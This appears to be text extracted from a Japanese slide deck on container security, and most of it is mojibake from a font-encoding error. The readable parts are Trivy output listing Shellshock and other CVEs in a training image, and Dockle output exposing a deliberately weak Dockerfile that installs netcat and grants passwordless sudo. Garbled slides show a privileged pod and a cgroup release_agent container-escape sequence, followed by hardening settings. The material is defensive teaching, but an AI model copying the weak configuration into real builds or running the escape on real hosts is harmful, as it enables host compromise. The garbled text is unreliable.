$.%<VTSTCJOBQBDIFDUM %'03&(306/%> ෆཁͳύοέʔδ ෆཁͳઃఆ ੬ऑੑΛؚΉύοέʔδ ˞$7&ΛؚΉCBTI ෆཁͳ*' ϕʔεΠϝʔδͷ%PDLFS fi MF ʢNPDIJ[VLJDWFBQBDIFEFCJBOCVTUFSʣ ίϯςφηΩϡϦςΟͷߟ͑ํΠϝʔδ ϦεΫ
  20. ୅දతͳΠϝʔδͷηΩϡϦςΟϦεΫʹରॲ͢ΔͨΊͷϓϥΫςΟε ˙֓೦ ɹ/*4541ΞϓϦέʔγϣϯίϯςφηΩϡϦςΟΨΠυʢ*1"೔ຊޠ຋༁൛ʣ ɹΠϝʔδͷରࡦ ɹIUUQTXXXJQBHPKQ fi MFTQEG ˙۩ମతͳઃఆ ɹ$*4#FODINBSL%PDLFS ɹ$POUBJOFS*NBHFTBOE#VJME'JMF$PO

    fi HVSBUJPO ɹIUUQTXXXDJTFDVSJUZPSHCFODINBSLEPDLFS ɹ#FTUQSBDUJDFTGPSXSJUJOH%PDLFS fi MFT ɹIUUQTEPDTEPDLFSDPNEFWFMPQEFWFMPQJNBHFTEPDLFS fi MF@CFTUQSBDUJDFT ίϯςφηΩϡϦςΟͷߟ͑ํΠϝʔδ ରࡦ
  21. ࠓճͷ߈ܸࣄྫͷΑ͏ʹ৴པͰ͖ͳ͍ϕʔεΠϝʔδΛ࢖༻͢ΔͱΠϝʔδʹҙਤͤ͵ηΩϡϦςΟϦεΫΛؚΉ ةݥੑ͕͋Γ·͢ɻ ϕʔεΠϝʔδʹ͸৴པͰ͖ΔΠϝʔδΛ࢖͏ɺ΋͘͠͸TDSBUDIͰΠϝʔδΛ࡞੒͢Δ ͱ͍͏͜ͱ͕ΠϝʔδͷηΩϡϦςΟରࡦΛߟ͑Δ্ͰͷେલఏͱͳΓ·͢ɻ 0 ff i DJBM*NBHFPG"QBDIF)5514FSWFS1SPKFDU '30.IUUQEBMQJOF 1MBDFDPOUFOU

    $01:JOEFYIUNMVTSMPDBMBQBDIFIUEPDT 36/DIPXOXXXEBUBXXXEBUBVTSMPDBMBQBDIFIUEPDTJOEFYIUNM %PDLFS fi MFʢIUUQEެࣜΠϝʔδΛ࢖༻ʣ ʢNPDIJ[VLJUSBJOJOHXFCTJUFQPDWʣ ৴པͰ͖ΔΠϝʔδΛར༻͢Δ ˞Πϝʔδͱͯ͠࢖༻͢Διϑτ΢ΣΞࣗମʹக໋తͳ੬ऑੑ͕ͳ͍͔΋ҙࣝ͢Δඞཁ͕͋Γ·͢ɻ ɹྫ͑͹ࠓճͷ৔߹IUUQEࣗମʹக໋తͳ੬ऑੑ͕ଘࡏ͍ͯ͠ͳ͍͔Λ༧Ί֬ೝ͓ͯ͘͠΂͖Ͱ͢ɻ ɹIUUQTIUUQEBQBDIFPSHTFDVSJUZWVMOFSBCJMJUJFT@IUNM ίϯςφηΩϡϦςΟͷߟ͑ํΠϝʔδ ରࡦ
  22. ͍͘ΒηΩϡϦςΟΛҙࣝͯ͠ΠϝʔδΛ࡞੒ͨ͠ͱͯ͠΋ҙਤͤͣ੬ऑੑ΍ةݥͳઃఆΛؚΜͰ͠·͏Մೳੑ͸͋Γ·͢ɻ ͦ͜Ͱॿ͚ʹͳΔͷ͕ίϯςφΠϝʔδͷεΩϟϯπʔϧͰ͢ɻ ˙୅දతͳΠϝʔδεΩϟϯπʔϧ ɾίϯςφΠϝʔδʹؚ·ΕΔύοέʔδͷ ɹ੬ऑੑΛݕ஌Ͱ͖Δ ɾͨͩ͠ύοέʔδϚωʔδϟʔΛ࢖༻ͤͣ ɹόΠφϦ͔Β௚઀Πϯετʔϧͨ͠΋ͷʹ ɹ͍ͭͯ͸ݕ஌Ͱ͖ͳ͍ ɾ%PDLFS fi

    MF΍LT.BOJGFTUͷ ɹεΩϟϯʹ΋ରԠ ɾίϯςφΠϝʔδ͕ϕετϓϥΫςΟεʹଇͬͨ ɹߏ੒ʹͳ͍ͬͯΔ͔ΛνΣοΫͰ͖Δ ɹɹɾ%PDLFS$*4#FODINBSL ɹɹɾ%PDLMFಠࣗͷϓϥΫςΟε ɾίϯςφΠϝʔδͷઃఆ্ͷηΩϡϦςΟϦεΫ ɹΛݕ஌Ͱ͖Δ ɹʢ5SJWZͰݕ஌Ͱ͖ͳ͍ύοέʔδҎ֎ͷϦεΫݕ஌ʹ༗ޮʣ IUUQTHJUIVCDPNBRVBTFDVSJUZUSJWZ IUUQTHJUIVCDPNHPPEXJUIUFDIEPDLMF ΠϝʔδΛεΩϟϯ͢Δ ˞͜͜Ͱ͸୅දతͳ044ͷΠϝʔδεΩϟϯπʔϧΛྫͱ͍ͯࣔͯ͠͠·͕͢͜Ε͕ਖ਼ղͱ͍͏ҙਤͰ͸͋Γ·ͤΜɻ ίϯςφηΩϡϦςΟͷߟ͑ํΠϝʔδ ରࡦ
  23. USJWZΛ༻͍ͯΠϝʔδΛεΩϟϯ͢Δ͜ͱͰɺҎԼͷΑ͏ʹΠϝʔδʹؚ·ΕΔύοέʔδͷ੬ऑੑΛݕ஌Ͱ͖·͢ɻ ࠓճ߈ܸʹ࢖༻͞Εͨ੬ऑੑʢ$7&ʣʹ͍ͭͯ΋USJWZΛ༻͍ͯݕ஌Ͱ͖͍ͯΔ͜ͱ͕෼͔Γ·͢ɻ $ trivy --severity CRITICAL,HIGH mochizuki875/training-website-poc:v1.0 2021-08-30T19:13:57.535+0900 INFO Need

    to update DB 2021-08-30T19:13:57.535+0900 INFO Downloading DB... 23.09 MiB / 23.09 MiB [--------------------------------------------------------------------------------------------------------------------------] 100.00% 12.18 MiB p/s 2s 2021-08-30T19:14:00.488+0900 INFO Detected OS: debian 2021-08-30T19:14:00.488+0900 INFO Detecting Debian vulnerabilities... 2021-08-30T19:14:00.510+0900 INFO Number of language-specific files: 0 mochizuki875/training-website-poc:v1.0 (debian 10.10) ===================================================== Total: 43 (HIGH: 38, CRITICAL: 5) +---------------+------------------+----------+-----------------------+------------------+--------------------------------------------------------------+ | LIBRARY | VULNERABILITY ID | SEVERITY | INSTALLED VERSION | FIXED VERSION | TITLE | +---------------+------------------+----------+-----------------------+------------------+--------------------------------------------------------------+ | apache2 | CVE-2021-33193 | HIGH | 2.4.38-3+deb10u5 | | httpd: Request splitting via HTTP/2 | | | | | | | method injection and mod_proxy | | | | | | | -->avd.aquasec.com/nvd/cve-2021-33193 | +---------------+ + + +------------------+ + ɾ ɾ ɾ +---------------+------------------+----------+-----------------------+------------------+--------------------------------------------------------------+ | bash | CVE-2014-6271 | CRITICAL | 4.2+dfsg-0.1 | 4.3-9.1 | bash: specially-crafted | | | | | | | environment variables can be | | | | | | | used to inject shell commands | | | | | | | -->avd.aquasec.com/nvd/cve-2014-6271 | + +------------------+----------+ +------------------+--------------------------------------------------------------+ | | CVE-2012-6711 | HIGH | | 4.3-1 | bash: heap-based buffer | | | | | | | overflow during echo of | | | | | | | unsupported characters | | | | | | | -->avd.aquasec.com/nvd/cve-2012-6711 | + +------------------+ + +------------------+--------------------------------------------------------------+ ɾ ɾ ɾ +---------------+------------------+ +-----------------------+------------------+--------------------------------------------------------------+ | openssl | CVE-2021-3711 | | 1.1.1d-0+deb10u6 | 1.1.1d-0+deb10u7 | openssl: SM2 Decryption | | | | | | | Buffer Overflow | | | | | | | -->avd.aquasec.com/nvd/cve-2021-3711 | +---------------+------------------+----------+-----------------------+------------------+--------------------------------------------------------------+ ίϯςφηΩϡϦςΟͷߟ͑ํΠϝʔδ ରࡦ
  24. $ dockle mochizuki875/training-website-poc:v1.0 2021-08-30T19:23:33.243+0900 INFO Failed to check latest version.

    not found version patterns FATAL - DKL-DI-0001: Avoid sudo command * Avoid sudo in container : RUN /bin/sh -c apt-get update && apt-get upgrade -y && DEBIAN_FRONTEND=noninteractive apt-get install -y apache2 && a2enmod cgid && apt-get -y install libtinfo5 && apt-get -y install netcat && apt-get install -y sudo && groupadd wheel && usermod -aG wheel www-data && echo "%wheel ALL=NOPASSWD: ALL" >> /etc/sudoers && apt-get clean && rm -rf /var/lib/apt/lists/* # buildkit WARN - CIS-DI-0001: Create a user for the container * Last user should not be root INFO - CIS-DI-0005: Enable Content trust for Docker * export DOCKER_CONTENT_TRUST=1 before docker pull/build INFO - CIS-DI-0006: Add HEALTHCHECK instruction to the container image * not found HEALTHCHECK statement INFO - CIS-DI-0008: Confirm safety of setuid/setgid files * setuid file: urwxr-xr-x bin/ping * setuid file: urwxr-xr-x usr/bin/passwd * setuid file: urwxr-xr-x usr/bin/sudo * setgid file: grwxr-xr-x usr/bin/expiry * setgid file: grwxr-xr-x usr/bin/wall * setgid file: grwxr-xr-x usr/bin/chage * setuid file: urwxr-xr-x bin/umount * setuid file: urwxr-xr-x bin/su * setuid file: urwxr-xr-x usr/bin/gpasswd * setgid file: grwxr-xr-x sbin/unix_chkpwd * setuid file: urwxr-xr-x bin/mount * setuid file: urwxr-xr-x usr/bin/newgrp * setuid file: urwxr-xr-x usr/bin/chfn * setuid file: urwxr-xr-x usr/bin/chsh EPDLMFΛ༻͍ͯΠϝʔδΛεΩϟϯ͢Δ͜ͱͰɺઃఆ্ͷηΩϡϦςΟϦεΫΛݕ஌͢Δ͜ͱ͕Ͱ͖·͢ɻ ࠓճͷ߈ܸྫʹ͓͍ͯίϯςφ৵ೖޙʹಛݖঢ֨ʹ༻͍ΒΕͨTVEPίϚϯυʹؔ͢Δܯࠂ͕ݕ஌͞Ε͍ͯΔ ͜ͱ͕෼͔Γ·͢ɻ ίϯςφηΩϡϦςΟͷߟ͑ํΠϝʔδ ରࡦ
  25. /P ରࡦ ৄࡉ  ৴པͰ͖ΔΠϝʔδΛར༻͢Δ ৴པͰ͖ͳ͍Πϝʔδʹ͸ɺ੬ऑੑ΍"UUBDL4VSGBDFʹͳΓಘΔύοέʔδɺ Ϛϧ΢ΣΞɺةݥͳઃఆͳͲ͋ΒΏΔηΩϡϦςΟϦεΫؚ͕·Ε͍ͯΔՄೳੑ͕ ͋ΔͨΊɺެࣜΠϝʔδΛ༻͍Δ͔ɺTDSBUDIͰΠϝʔδΛ࡞੒͢΂͖ɻ  ΠϝʔδΛখ͘͢͞Δ

    ҰൠతʹΠϝʔδ༰ྔ͕େ͖͍ͱ͍͏͜ͱ͸ΠϝʔδʹηΩϡϦςΟϦεΫΛؚΉՄೳੑ΋ ߴ͘ͳΔͨΊɺՄೳͳݶΓΠϝʔδΛখ͘͢͞΂͖ɻ  ΠϝʔδΛεΩϟϯ͢Δ ҙਤͤ͵੬ऑੑ΍ઃఆෆඋͷࠞೖΛ๷ࢭ͢ΔͨΊʹΠϝʔδͷεΩϟϯΛߦ͏ɻ ࣌ؒܦաͱڞʹൃੜͨ͠੬ऑੑʹରԠ͢ΔͨΊεΩϟϯ͸ܧଓతʹߦ͏ɻ ˞ͨͩ͠πʔϧΛ༻͍Δ͜ͱͰશͯͷηΩϡϦςΟϦεΫΛऔΓআ͚ΔΘ͚Ͱ͸ͳ͍ͨΊ ɹ Λ౿·্͑ͨͰิॿతͳ໾ׂͱͯ͠πʔϧΛ׆༻͢΂͖ɻ ηΩϡϦςΟରࡦ·ͱΊ ίϯςφηΩϡϦςΟͷߟ͑ํΠϝʔδ ରࡦ
  26. $POUBJOFS)PTU 04 QSPDFTT" SPPUGT  QSPDFTT# QSPDFTT$ SPPUGT  QSPDFTT%

    $POUBJOFS *TPMBUJPO /BNFTQBDFɿϓϩηεͷ࣮ߦۭؒΛִ཭ QJWPU@SPPU 0WFSMBZ'4ɿSPPUGTΛִ཭ -JNJUBUJPO DHSPVQɿϦιʔεΛ੍ݶ 3FTUSJDUJPO $BQBCJMJUZɿϓϩηεͷݖݶൣғΛ੍ݶ 4FDDPNQɿγεςϜίʔϧΛ੍ݶ ."$ʢ"QQ"SNPS4&-JOVYʣɿϑΝΠϧΞΫηεΛ੍ݶ 3FBE0OMZ.PVOUɿॏཁͳϑΝΠϧγεςϜʢQSPD΍TZT౳ʣΛ30ͰϚ΢ϯτ ɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹFUD Ұൠతͳϓϩηεͱίϯςφͷҧ͍͸ɺίϯςφͱ࣮ͯ͠ߦ͞ΕΔϓϩηε͸-JOVYΧʔωϧͷ༷࣋ͭʑͳ࢓૊ΈΛ࢖ͬͯ ଞͷϓϩηε͔Βִ཭͞Ε͍ͯΔ఺Ͱ͢ɻ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ جຊ ݪଇ
  27. $POUBJOFS)PTU $POUBJOFS)PTU QSPDFTT $POUBJOFS" QSPDFTT $POUBJOFS# ίϯςφͱͯ͠ͷִ཭ੑ͕ߴ͍ঢ়ଶ ίϯςφͱͯ͠ͷִ཭ੑ͕௿͍ঢ়ଶ ίϯςφ಺Ͱಈ͘ϓϩηεͷಈ࡞͕ ϗετʹӨڹ͠ͳ͍

    ίϯςφ಺Ͱಈ͘ϓϩηεͷҰ෦ͷ ಈ࡞͕ϗετʹӨڹͯ͠͠·͏ ίϯςφͷִ཭ੑΛҡ࣋͢Δ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ جຊ ݪଇ ɹʻʻɹηΩϡϦςΟϦεΫɹʻʻɹ খ େ
  28. ,VCFSOFUFT.BOJGFTUͰ͸ίϯςφʹର͢Δ༷ʑͳىಈઃఆΛఆٛͰ͖·͕͢ɺ ͜ͷઃఆʹΑΓίϯςφͷִ཭ੑΛڧΊΔ͜ͱ΋ऑΊΔ͜ͱ΋Ͱ͖·͢ɻ ͜ΕΒΛద੾ʹߦ͏͜ͱ͕ɺίϯςφϨΠϠʹ͓͚ΔηΩϡϦςΟ֬อʹܨ͕Γ·͢ɻ BQJ7FSTJPOW LJOE1PE NFUBEBUB MBCFMT SVOVCVOUV OBNFVCVOUV TQFD

    DPOUBJOFST JNBHFVCVOUV OBNFVCVOUVTFD DPNNBOE<CJOTI D XIJMFEPTMFFQEPOF> SFTPVSDFT MJNJUT DQVN NFNPSZ.J TFDVSJUZ$POUFYU SFBE0OMZ3PPU'JMFTZTUFNUSVF WPMVNF.PVOUT NPVOU1BUIUNQ OBNFIPTUQBUITBNQMF WPMVNFT OBNFIPTUQBUITBNQMF IPTU1BUI QBUIUNQ LTNBOJGFTUͷྫ ࢖༻ՄೳϦιʔεΛ੍ݶ͢Δ͜ͱͰִ཭ੑ޲্ ίϯςφͷSPPUGT΁ͷॻ͖ࠐΈΛېࢭ͢Δ͜ͱͰִ཭ੑ޲্ ˞ίϯςφͷSPPUGTͷ࣮ଶ͸ίϯςφϗετ্ͷ0WFSMBZGT ίϯςφϗετͷσΟϨΫτϦΛόΠϯυϚ΢ϯτ͓ͯ͠Γִ཭ੑ௿Լ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ جຊ ݪଇ
  29. ࠓճ߈ܸ͕੒ཱͯ͠͠·ͬͨέʔεʹ͓͍ͯɺ։ൃऀ͕༻ҙͨ͠ίϯςφىಈઃఆʢ,VCFSOFUFT.BOJGFTUʣ͕Ͳ͏͔ͩͬͨ ݟͯΈ·͠ΐ͏ɻ ,VCFSOFUFT.BOJGFTUΛݟͯΈΔͱɺίϯςφʹಛݖΛ෇༩͍ͯ͠Δ͜ͱ͕෼͔Γ·͢ɻ BQJ7FSTJPOW LJOE1PE NFUBEBUB MBCFMT SVOXFC OBNFXFC TQFD

    DPOUBJOFST JNBHFNPDIJ[VLJUSBJOJOHXFCTJUFQPDW OBNFXFC TFDVSJUZ$POUFYU QSJWJMFHFEUSVF ࠓճίϯςφͷىಈʹར༻ͨ͠ͷ,VCFSOFUFT.BOJGFTU ʢXFCJOTFDVSFQPEZNMʣ ίϯςφʹಛݖΛ༩͍͑ͯΔ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ϦεΫ
  30. ίϯςφΛಛݖͰಈ࡞ͤ͞Δͱ͍͏͜ͱ͸ίϯςφϓϩηεʹϗετͷಛݖϢʔβʔʢSPPUʣͱಉ౳ͷݖݶΛ࣋ͨͤΔ͜ͱʹͳΓɺ ίϯςφͷִ཭ੑΛ௿Լͤ͞Δ͜ͱʹܨ͕Γ·͢ɻ $POUBJOFS)PTU 04 QSPDFTT" SPPUGT  QSPDFTT# QSPDFTT$ SPPUGT

     QSPDFTT% $POUBJOFS *TPMBUJPO /BNFTQBDFɿϓϩηεͷ࣮ߦۭؒΛִ཭ QJWPU@SPPU 0WFSMBZ'4ɿSPPUGTΛִ཭ -JNJUBUJPO DHSPVQɿϦιʔεΛ੍ݶ 3FTUSJDUJPO $BQBCJMJUZɿϓϩηεͷݖݶൣғΛ੍ݶ 4FDDPNQɿγεςϜίʔϧΛ੍ݶ ."$ʢ"QQ"SNPS4&-JOVYʣɿϑΝΠϧΞΫηεΛ੍ݶ 3FBE0OMZ.PVOUɿॏཁͳϑΝΠϧγεςϜʢQSPD΍TZT౳ʣΛ30ͰϚ΢ϯτ ɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹFUD 1SJWJMFHFE ϗετͷಛݖϢʔβʔͱ ಉ౳ͷݖݶ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ϦεΫ
  31. NPVOUcHSFQDHSPVQ ʢུʣ DHSPVQPOTZTGTDHSPVQNFNPSZUZQFDHSPVQ SX OPTVJE OPEFW OPFYFD SFMBUJNF NFNPSZ 

    DHSPVQPOTZTGTDHSPVQQJETUZQFDHSPVQ SX OPTVJE OPEFW OPFYFD SFMBUJNF QJET  DHSPVQPOTZTGTDHSPVQDQV DQVBDDUUZQFDHSPVQ SX OPTVJE OPEFW OPFYFD SFMBUJNF DQV DQVBDDU  DHSPVQPOTZTGTDHSPVQSENBUZQFDHSPVQ SX OPTVJE OPEFW OPFYFD SFMBUJNF SENB  ʢུʣ ʢಛݖίϯςφʣ ɹࠓճͷέʔεͰ͸ಛݖΛ༩͑ͨ͜ͱʹΑΓDHSPVQ΁ͷΞΫηεݖ͕38ʹઃఆ͞Ε·ͨ͠ ࠓճͷ߈ܸࣄྫͰ͸ίϯςφʹಛݖΛ෇༩ͨ͜͠ͱͰɺ ຊདྷίϯςφͷ࢓૊Έ্3FBE0OMZ͕ઃఆ͞ΕΔ΂͖DHSPVQ΁ͷॻ͖ࠐΈ͕Մೳͳঢ়ଶͱͳ͍ͬͯ·ͨ͠ɻ ͜ΕʹΑΓDHSPVQΛίϯςφ಺͔Βૢ࡞ͯ͠ɺϗετ্Ͱ೚ҙͷϓϩάϥϜΛ࣮ߦ͢Δͱ͍͏߈ܸʹܨ͛Δ͜ͱ͕ Ͱ͖ͯ͠·͍·ͨ͠ɻ NPVOUcHSFQDHSPVQ ʢུʣ DHSPVQPOTZTGTDHSPVQNFNPSZUZQFDHSPVQ SP OPTVJE OPEFW OPFYFD SFMBUJNF NFNPSZ  DHSPVQPOTZTGTDHSPVQQJETUZQFDHSPVQ SP OPTVJE OPEFW OPFYFD SFMBUJNF QJET  DHSPVQPOTZTGTDHSPVQDQV DQVBDDUUZQFDHSPVQ SP OPTVJE OPEFW OPFYFD SFMBUJNF DQV DQVBDDU  DHSPVQPOTZTGTDHSPVQSENBUZQFDHSPVQ SP OPTVJE OPEFW OPFYFD SFMBUJNF SENB  ʢུʣ ʢඇಛݖίϯςφʣ ɹ௨ৗίϯςφͰ͸DHSPVQ΁ͷΞΫηεݖ͸30ʹઃఆ͞Ε·͢ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ϦεΫ
  32. NLEJSTZTGTDHSPVQSENBY ɾ ɾ ɾ TIDFDIPaaTZTGTDHSPVQSENBYDHSPVQQSPDT ຊདྷίϯςφ͔Β͸ڐՄ͞Ε͍ͯͳ͍ DHSPVQͷૢ࡞Λ௨ͨ͡ϓϩάϥϜͷ࣮ߦ NLEJSTZTGTDHSPVQSENBY NLEJSDBOOPUDSFBUFEJSFDUPSZTZTGTDHSPVQSENBY3FBEPOMZ fi

    MFTZTUFN ʢඇಛݖίϯςφʣ ɹDHSPVQ΁ͷΞΫηεݖ͕30ͳͷͰDHSPVQͷ࡞੒͕ڐՄ͞Ε͍ͯͳ͍ ʢಛݖίϯςφʣ ɹDHSPVQ΁ͷΞΫηεݖ͕38ʹઃఆ͞Ε͓ͯΓDHSPVQͷ࡞੒΍ઃఆมߋ͕Մೳ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ࠓճͷ߈ܸࣄྫͰ͸ίϯςφʹಛݖΛ෇༩ͨ͜͠ͱͰɺ ຊདྷίϯςφͷ࢓૊Έ্3FBE0OMZ͕ઃఆ͞ΕΔ΂͖DHSPVQ΁ͷॻ͖ࠐΈ͕Մೳͳঢ়ଶͱͳ͍ͬͯ·ͨ͠ɻ ͜ΕʹΑΓDHSPVQΛίϯςφ಺͔Βૢ࡞ͯ͠ɺϗετ্Ͱ೚ҙͷϓϩάϥϜΛ࣮ߦ͢Δͱ͍͏߈ܸʹܨ͛Δ͜ͱ͕ Ͱ͖ͯ͠·͍·ͨ͠ɻ ϦεΫ
  33. ୅දతͳίϯςφͷηΩϡϦςΟϦεΫʹରॲ͢ΔͨΊͷϓϥΫςΟε ˙֓೦ ɹ/*4541ΞϓϦέʔγϣϯίϯςφηΩϡϦςΟΨΠυʢ*1"೔ຊޠ຋༁൛ʣ ɹίϯςφͷରࡦ ɹϗετͷରࡦʣ ɹIUUQTXXXJQBHPKQ fi MFTQEG ˙۩ମతͳઃఆ ɹ1PE4FDVSJUZ4UBOEBSET

    ɹIUUQTLVCFSOFUFTJPEPDTDPODFQUTTFDVSJUZQPETFDVSJUZTUBOEBSET ɹ/4"$*4",VCFSOFUFT)BSEFOJOH(VJEBODFʢ,VCFSOFUFT1PETFDVSJUZʣ ɹIUUQTNFEJBEFGFOTFHPW"VH$53@,6#&3/&5&4)"3%&/*/((6*%"/$&1%' ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ରࡦ
  34. ,VCFSOFUFTͰίϯςφΛσϓϩΠ͢Δࡍ͸ɺσϑΥϧτͰίϯςφϓϩηεʹର͢Δ੍ݶ͕ߦΘΕ·͢ɻ ͦͷͨΊಛʹઃఆΛߦΘͣͱ΋࠷௿ݶ ͷִ཭ੑΛ୲อ͢Δ͜ͱ͕Ͱ͖·͢ɻ ࠓճͷྫͰ͸ҎԼͷΑ͏ʹσϑΥϧτઃఆͰίϯςφΛىಈ͍ͯ͠Ε͹ɺ ίϯςφ͔Βϗετʹରͯ͠ίϚϯυΛ࣮ߦ͞ΕΔ͜ͱΛ๷͙͜ͱ͕Ͱ͖·ͨ͠ɻ BQJ7FSTJPOW LJOE1PE NFUBEBUB MBCFMT SVOXFC

    OBNFXFC TQFD DPOUBJOFST JNBHFNPDIJ[VLJUSBJOJOHXFCTJUFQPDW OBNFXFC ࠓճίϯςφͷىಈʹར༻ͨ͠ͷ,VCFSOFUFT.BOJGFTU ʢXFCEFGBVMUQPEZNMʣ ίϯςφʹෆཁͳઃఆΛߦΘͳ͍ ,VCFSOFUFT1PE4FDVSJUZ4UBOEBSETʹ͓͚Δ#BTFMJOF૬౰ ෆཁͳઃఆΛߦΘͳ͍ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ରࡦ
  35. σϑΥϧτͷઃఆʹରͯ͠ద੾ͳઃఆΛߦ͏͜ͱͰίϯςφͷִ཭ੑΛ޲্ͤ͞ɺ ηΩϡϦςΟϨϕϧΛߴΊΔ͜ͱ͕Ͱ͖·͢ɻ ˞۩ମతͳઃఆ஋ͷҰཡʹ͍ͭͯ͸ઌʹࣔͨ͠ϓϥΫςΟεΛ͝ࢀর͍ͩ͘͞ɻ BQJ7FSTJPOW LJOE1PE NFUBEBUB MBCFMT SVOXFCTFDVSF OBNFXFCTFDVSF TQFD

    TFDVSJUZ$POUFYU TFDDPNQ1SP fi MF UZQF3VOUJNF%FGBVMU BVUPNPVOU4FSWJDF"DDPVOU5PLFOGBMTF DPOUBJOFST JNBHFNPDIJ[VLJUSBJOJOHXFCTJUFQPDW OBNFXFC TFDVSJUZ$POUFYU BMMPX1SJWJMFHF&TDBMBUJPOGBMTF SFBE0OMZ3PPU'JMFTZTUFNUSVF DBQBCJMJUJFT ESPQ BMM BEE $)08/ 4&56*% 4&5(*% /&5@#*/%@4&37*$& SFTPVSDFT MJNJUT DQVN NFNPSZ.J WPMVNF.PVOUT OBNFMPHWPMVNF NPVOU1BUIVTSMPDBMBQBDIFMPHT WPMVNFT OBNFMPHWPMVNF FNQUZ%JS\^ ɾɾɾᶃ ɾɾɾᶄ ɾɾɾᶅ ɾɾɾᶆ ɾɾɾᶇ ɾɾɾᶆ <ִ཭ੑΛΑΓߴΊΔઃఆͷྫ> ɹɹᶃTFDDPNQʹΑΔγεςϜίʔϧͷ੍ݶ ɹɹᶄ4FSWJDF"DDPVOUΛϚ΢ϯτ͠ͳ͍ ɹɹᶅಛݖঢ֨ͷېࢭ ɹɹᶆSPPUGT΁ͷॻ͖ࠐΈېࢭ ɹɹᶇ$BQBCJMJUZͷണୣɾඞཁ࠷খݶͷ෇༩ ɹɹᶈϦιʔε࢖༻ྔΛ੍ݶ ִ཭ੑΛΑΓߴΊΔઃఆ ηΩϡϦςΟରࡦΛࢪͨ͠,VCFSOFUFT.BOJGFTU ʢXFCTFDVSFQPEZNMʣ ˞ಛʹࠓճͷ߈ܸʹؔ࿈͢Δରࡦ͸੨ࣈͰදه͍ͯ͠·͢ɻ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ɾɾɾᶈ ରࡦ
  36. ίϯςφͷִ཭ੑΛΑΓߴΊΔઃఆͷ୅දతͳ߲໨ͷͭͱͯ͠ɺ ίϯςφͷ࣮ߦϢʔβʔΛSPPUͱͤͣඇSPPUͱ͢΂͖ͱ͍ͬͨ಺༰͕ڍ͛ΒΕ·͢ɻ ˞ίϯςφΠϝʔδɺ,VCFSOFUFT.BOJGFTUͰಛʹࢦఆ͠ͳ͍৔߹͸SPPUͰίϯςφ͕ىಈ͞ΕΔ '30.VCVOUV $.%<CJOTI D XIJMFEPTMFFQEPOF> BQJ7FSTJPOW LJOE1PE NFUBEBUB

    MBCFMT SVOVCVOUV OBNFVCVOUVSPPU TQFD DPOUBJOFST JNBHFNPDIJ[VLJVCVOUVSPPU OBNFVCVOUVSPPU '30.VCVOUV 36/VTFSBEENVVTFS 64&3VTFS 803,%*3IPNFVTFS $.%<CJOTI D XIJMFEPTMFFQEPOF> BQJ7FSTJPOW LJOE1PE NFUBEBUB MBCFMT SVOVCVOUV OBNFVCVOUVVTFS TQFD DPOUBJOFST JNBHFNPDIJ[VLJVCVOUVSVOBT OBNFVCVOUVVTFS TFDVSJUZ$POUFYU SVO"T6TFS SVO"T(SPVQ SVO"T/PO3PPUUSVF %PDLFS fi MFʢSPPUʣ .BOJGFTUʢSPPUʣ %PDLFS fi MFʢඇSPPUʣ .BOJGFTUʢඇSPPUʣ ίϯςφ࣮ߦϢʔβʔΛࢦఆ ίϯςφ࣮ߦϢʔβʔʢ6*%ʣΛࢦఆ Ճ͑ͯSPPUͰͷ࣮ߦΛېࢭ ίϯςφͷ࣮ߦϢʔβʔʹ͍ͭͯʢִ཭ੑΛߴΊΔઃఆͷͭʣ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ରࡦ
  37. QTBVYG ʢུʣ SPPU 4MVTSCJODPOUBJOFSETIJNSVODWOBNFTQBDFLTJPJE ECEGFCCFEFF SPPU 4Ta@QBVTF SPPU 4Ta@CJOTIDXIJMFEPTMFFQEPOF SPPU

    4a@TMFFQ ʢུʣ SPPU 4MVTSCJODPOUBJOFSETIJNSVODWOBNFTQBDFLTJPJE GDBDBCBDBEGCGDDBFB SPPU 4Ta@QBVTF VTFS 4Ta@CJOTIDXIJMFEPTMFFQEPOF VTFS 4a@TMFFQ ʢུʣ LVCFDUMHFUQP /".&3&"%:45"5643&45"354"(& VCVOUVSPPU3VOOJOHN VCVOUVVTFS3VOOJOHN SPPUͰ࣮ߦͨ͠ίϯςφͷϓϩηε ʢVCVOUVSPPUʣ ඇSPPUͰ࣮ߦͨ͠ίϯςφͷϓϩηε ʢVCVOUVVTFSʣ ͜Ε͸ɺίϯςφͱίϯςφϗετ্Ͱͷίϯςφϓϩηεͷ࣮ߦϢʔβʔ͕ΠίʔϧʹͳΔ͜ͱʹΑΓɺ SPPUϢʔβʔͰ࣮ߦͨ͠ίϯςφ͕ίϯςφϗετ্ͰSPPUϓϩηεͱ࣮ͯ͠ߦ͞ΕΔ͜ͱʹͳΔͨΊͰ͢ɻ ʢݖݶִ཭ͷ؍఺Ͱίϯςφͷִ཭ੑΛଛͳ͏ʣ ίϯςφىಈঢ়گ ίϯςφϗετ্Ͱͷϓϩηε֬ೝ ίϯςφηΩϡϦςΟͷߟ͑ํίϯςφ ରࡦ ࣮ࡍʹίϯςφΛىಈͤ͞ɺίϯςφϗετ্Ͱϓϩηεͷ࣮ߦϢʔβʔΛ֬ೝ͢Δͱɺ ͔֬ʹίϯςφͷ࣮ߦϢʔβʔͱϓϩηεͷ࣮ߦϢʔβʔ͕Ұக͍ͯ͠Δ͜ͱ͕෼͔Γ·͢ɻ ˞͜Ε͸೥݄ݱࡏɺίϯςφͱϗετͷ6TFS/BNFTQBDF͕ڞ௨Ͱ͋Δͱ͍͏࢓૊ΈʹΑΔ΋ͷ
